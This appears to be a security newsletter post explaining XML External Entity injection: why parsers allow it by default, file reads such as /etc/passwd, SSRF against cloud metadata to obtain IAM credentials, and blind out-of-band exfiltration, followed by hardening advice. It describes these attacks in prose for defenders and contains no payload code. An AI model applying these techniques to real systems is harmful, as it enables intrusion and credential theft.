XXE (XML External Entity) injection lets attackers read arbitrary files from a server, trigger server-side request forgery, or execute denial-of-service attacks by exploiting how XML parsers process external entity references. Most XML parsers enable external entity processing by default, which means any application that parses user-supplied XML is potentially vulnerable unless explicitly hardened.
Analysis Briefing
- Topic: XML External Entity injection mechanics and prevention
- Analyst: Mike D (@MrComputerScience)
- Context: A structured investigation kicked off by GPT-4o
- Source: Pithy Security
- Key Question: Why does uploading an XML file let attackers read your server’s password file?
Why XML Parsers Process External Entities by Default
XML was designed in 1998 to support rich document interchange, including references to external resources. External entities are a legitimate XML feature that lets one document include content from another file or URL. The spec ships with this capability enabled.
Parser vendors implemented the spec faithfully. Disabling external entity processing was left to application developers. Most developers are not aware the feature exists until they encounter a vulnerability report. The default-on behavior has persisted across decades of parser releases because changing it breaks backward compatibility.
The result is a vulnerability that is not a bug in the parser. It is the correct implementation of a dangerous default.
How Attackers Read /etc/passwd Through an XML Upload
A classic XXE payload targets any endpoint that accepts XML: document uploads, SOAP web services, SVG file processors, PDF generators that accept XML templates, and Excel file imports (which use XML internally).
The attacker submits a crafted XML document declaring an external entity that points to a local file. When the parser resolves the entity, it reads the file and substitutes its contents into the document. The application then returns the document or processes it in a way that includes the file contents in the response.
The same technique works for SSRF by pointing the external entity at an internal URL instead of a local file. Cloud environments are particularly exposed because the AWS metadata endpoint at 169.254.169.254 is reachable from any server and returns IAM credentials when queried.
When Blind XXE Leaks Data Without a Direct Response
Many applications parse XML without reflecting the parsed content back in the response. Blind XXE requires out-of-band exfiltration. The attacker points the external entity at an attacker-controlled server. The vulnerable application makes a DNS lookup or HTTP request to that server, confirming the vulnerability and potentially leaking data through the URL itself.
Tools like Burp Collaborator and interactsh automate out-of-band detection for blind XXE. A single request with a Collaborator URL as the external entity target confirms exploitability without requiring any response from the application.
The fix is a single line in most parsers. Disable external entity processing and document type declarations (DTDs) entirely. No legitimate modern application needs them.
What This Means For You
- Disable external entity processing explicitly in every XML parser your application uses, because most parsers enable it by default and the fix is one configuration call.
- Audit every file upload endpoint that accepts XML, SVG, DOCX, or XLSX formats, since all of these use XML internally and are XXE attack surfaces if parsed server-side.
- Add XXE payloads to your security test suite, targeting your own upload and API endpoints before attackers find them during a real engagement.
- Check your SSRF exposure via XXE if your servers can reach cloud metadata endpoints, because a successful XXE-to-SSRF attack on AWS can return IAM credentials in one request.
Enjoyed this deep dive? Join my inner circle:
- Pithy Security → Stay ahead of cybersecurity threats.
